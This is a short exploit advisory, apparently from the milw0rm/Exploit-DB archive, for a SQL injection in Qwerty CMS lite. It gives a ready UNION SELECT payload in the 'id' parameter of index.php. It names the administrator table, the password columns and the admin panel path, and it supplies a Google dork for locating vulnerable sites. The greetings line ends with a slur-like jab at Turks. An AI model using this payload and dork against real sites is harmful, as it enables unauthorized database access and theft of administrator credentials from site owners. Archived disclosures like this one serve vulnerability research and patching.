Qwerty CMS - 'id' SQL Injection

EDB-ID:

8104

CVE:

N/A


Author:

b3

Type:

webapps


Platform:

PHP

Date:

2009-02-24


QWERTY CMS lite - SQL INJ
Found: b3 from GraBBerZ.com
=
Injection in index.php variable: id
http://[site]/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
=
Administrator Table: rkh8t5po
Columns: secret873ktlW,pass459khyf
Column with pass: pass459khyf
Admin CP: /admin/admin.php
=
CMS PAGE : http://web-sites.kiev.ua
GOOGLE DORK : allinurl:index.php?act=publ
Greetz: GraBBerZ, Antichat, XN, no respect all Turk =\

# milw0rm.com [2009-02-24]